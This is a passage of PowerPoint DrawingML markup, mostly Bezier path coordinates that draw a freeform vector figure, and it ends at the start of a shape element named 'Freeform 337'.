                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="199"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="71" y="200"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="197"/>
                      <a:pt x="4" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="192"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="169"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="8" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="183"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="146"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="98"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="159" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="157"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="158"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="153"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="150"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="75"/>
                      <a:pt x="84" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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5"/>
                      <a:pt x="86" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="71"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="118"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="131"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="141"/>
                      <a:pt x="40" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="36" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="147"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="158"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="198"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="185"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="186"/>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9"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="120"/>
                      <a:pt x="135" y="98"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="111"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="71"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="63"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="55"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="44"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="37"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="38"/>
                      <a:pt x="100" y="39"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="106" y="51"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="46"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="45"/>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1"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="67" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="38"/>
                      <a:pt x="70" y="37"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="62"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="67"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="64"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="44"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71" y="46"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="41"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="44"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="99" y="40"/>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Freeform 337"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="1518"/>
                <a:ext cx="3" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
